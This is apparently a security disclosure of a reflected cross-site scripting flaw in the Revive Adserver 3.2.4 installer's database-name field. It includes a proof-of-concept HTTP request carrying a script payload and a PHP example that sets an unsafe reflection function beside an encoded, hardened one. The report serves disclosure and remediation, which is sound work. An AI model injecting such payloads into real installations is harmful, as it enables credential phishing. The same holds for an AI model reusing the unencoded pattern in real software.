“Cricetinae” :)
The dbName parameter in Step 2 of the Installation Wizard is vulnerable to Cross-Site Scripting when the form is returned with an error: the submitted database name is reflected into the error message without HTML encoding.
A Cross-Site Scripting issue lets an attacker run JavaScript of their choice in the victim's browser. It enables most client-side attacks, including but not limited to phishing, temporary defacement and browser key-logging. Exploitation frameworks such as BeEF make the offensive use easier.
Though this may be treated as a Self-XSS, the place where the issue occurs is sensitive. If the user who is going to set up Revive Adserver follows an untrusted, malicious guide containing a specially crafted XSS payload, the payload can help in gaining access to the database, for example by redirecting the user to the attacker's site and tricking them into entering the database credentials there, or in some other way.
### HTTP Request
Payload `something<script>alert('xss');</script>` for the Database Name field:
```http
POST /revive-adserver/www/admin/install.php HTTP/1.1
..
..
Connection: close

_qf__install-db-form=&action=database&moreFieldsShown=&dbName=something<script>alert('xss');</script>&dbUser=root&dbPassword=roots&dbHost=localhost&dbType=mysql&dbLocal=0&dbPort=3306&dbTableType=MYISAM&dbTablePrefix=rv_&save=Continue+%C2%BB
```
### HTTP Response
```http
HTTP/1.1 200 OK
…
<span> Database names cannot contain "/", "\", ".", or characters that are not allowed in filenames <br /> Installation failed to create the database something<script>alert('xss');</script></span>
```
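The response above shows the root cause: the rejected dbName is echoed back inside the error message as raw HTML. The following PHP snippet is an added illustration and is not code from Revive Adserver; it places the vulnerable reflection pattern beside a corrected version that encodes the value with htmlspecialchars() for an HTML text context and, as defence in depth, applies the character rule the installer's own error message states. Function names, the exact set of filename-illegal characters and the 64-character limit (MySQL's identifier limit) are assumptions made for the example.

```php
<?php
// Added example (not Revive Adserver code): hypothetical helpers showing the
// vulnerable pattern and the hardened one for the Step 2 dbName error message.

// Constructed input mirroring the payload from the report.
$dbName = "something<script>alert('xss');</script>";

// VULNERABLE: the raw value is interpolated into HTML, so any markup in it
// becomes part of the page and the script executes in the user's browser.
function renderDbErrorUnsafe(string $dbName): string
{
    return '<span>Installation failed to create the database ' . $dbName . '</span>';
}

// Defence in depth: enforce the rule the installer already states (no "/",
// "\", "." or characters that are not allowed in filenames). The set of
// filename-illegal characters and the length cap (MySQL's 64-character
// identifier limit) are assumptions for this example.
function isValidDbName(string $dbName): bool
{
    if ($dbName === '' || strlen($dbName) > 64) {
        return false;
    }
    // Reject slash, backslash, dot, control characters and the characters
    // that common filesystems disallow in file names.
    return preg_match('~[/\\\\.\x00-\x1f<>:"|?*]~', $dbName) !== 1;
}

// HARDENED: encode the value for an HTML text context before reflecting it.
// ENT_QUOTES also encodes ' and " so the result is safe inside attribute
// values; ENT_SUBSTITUTE avoids an empty result on malformed UTF-8 input,
// which would otherwise hide the error entirely.
function renderDbErrorSafe(string $dbName): string
{
    $escaped = htmlspecialchars($dbName, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<span>Installation failed to create the database ' . $escaped . '</span>';
}

if (!isValidDbName($dbName)) {
    // The first line keeps the <script> tag intact; the second renders it as
    // inert text (&lt;script&gt;...), so the browser shows it instead of running it.
    echo renderDbErrorUnsafe($dbName), PHP_EOL;
    echo renderDbErrorSafe($dbName), PHP_EOL;
}
```

The encoding step is the actual fix: validation alone is not sufficient, because the error path must display whatever the user typed, and any reflected value has to be encoded for the context it lands in.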
### Test Environment Details
- Version: Latest as on Sept 17: revive-adserver-3.2.4 downloaded from the official website
- Setup type: local
- Browser: Firefox 47.0
- OS: Mac OS X
Cheers,
Pavan